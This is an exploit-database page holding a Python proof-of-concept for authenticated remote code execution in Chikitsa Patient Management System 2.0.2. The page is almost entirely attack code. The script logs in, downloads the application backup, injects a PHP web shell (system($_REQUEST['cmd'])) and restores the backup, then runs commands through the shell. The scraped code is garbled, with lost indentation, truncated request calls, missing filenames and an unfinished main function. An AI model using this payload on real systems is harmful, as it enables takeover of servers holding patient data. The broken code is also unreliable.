Chikitsa patient management system 2.0.2 backup remote code execution (rce) (authenticated) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2021-12-09 | Type : webapps | Platform : php
This exploit / vulnerability Chikitsa patient management system 2.0.2 backup remote code execution (rce) (authenticated) is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: Chikitsa Patient Management System 2.0.2 - 'plugin' Remote Code Execution (RCE) (Authenticated)
# Date: 03/12/2021
# Exploit Author: 0z09e (
# Vendor Homepage:
# Software Link:
# Version: 2.0.2
# Tested on: Ubuntu

import requests
import os
from zipfile import ZipFile
import argparse

def login(session , target , username , password):
print("[+] Attempting to login with the credential")
url = target + "/index.php/login/valid_signin"
login_data = {"username" : username , "password" : password} , data=login_data , verify=False)
return session

def download_backup( session , target):
print("[+] Downloading the backup (This may take some time)")
url = target + "/index.php/settings/take_backup/"
backup_req = session.get(url , verify=False)
global tmp_dir
tmp_dir = os.popen("mktemp -d").read().rstrip()
open(tmp_dir + "/" , "wb").write(backup_req.content)
print(f"[+] Backup downloaded at {tmp_dir}/")

def modify_backup():
print("[+] Modifying the backup by injecting a backdoor.")
zf = ZipFile(f'{tmp_dir}/', 'r')
open(tmp_dir + "/uploads/media/rce.php" , "w").write("<?php system($_REQUEST['cmd']);?>")
os.popen(f"cd {tmp_dir}/ && zip -r chikitsa-backup.sql prefix.txt uploads/").read()

def upload_backup(session , target):
print("[+] Uploading the backup back into the server.(This may take some time)")
url = target + "/index.php/settings/restore_backup"
file = open(f"{tmp_dir}/" , "rb").read() , verify=False ,files = {"backup" : ("" , file)})
print(f"[+] Backdoor Deployed at : {target}/uploads/restore_backup/uploads/media/rce.php")
print(f"[+] Example Output : {requests.get(target +'/uploads/restore_backup/uploads/media/rce.php?cmd=id' , verify=False).text}")

def main():
parser = argparse.ArgumentParser("""
__ _ __ _ __
_____/ /_ (_) /__(_) /__________ _
/ ___/ __ \/ / //_/ / __/ ___/ __ `/
/ /__/ / / / / ,< / / /_(__ ) /_/ /
\___/_/ /_/_/_/|_/_/\__/____/\__,_/

Chikitsa Patient Management System 2.0.2 Authenticated Remote Code Execution :
POC Written By - 0z09e (\n\n""" , formatter_class=argparse.RawTextHelpFormatter)
req_args = parser.add_argument_group('required arguments')
req_args.add_argument("URL" , help="Target URL. Example :")
req_args.add_argument("-u" , "--username" , help="Username" , required=True)
req_args.add_argument("-p" , "--password" , help="password", required=True)
args = parser.parse_args()

target = args.URL
if target[-1] == "/":
target = target[:-1]
username = args.username
password = args.password

session = requests.session()
login(session ,target , username , password)
download_backup(session , target )
upload_backup(session , target)

if __name__ == "__main__":

Chikitsa patient management system 2.0.2 backup remote code execution (rce) (authenticated)

Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php

▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple

▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php

Chikitsa patient management system 2.0.2 backup remote code execution (rce) (authenticated) Vulnerability / Exploit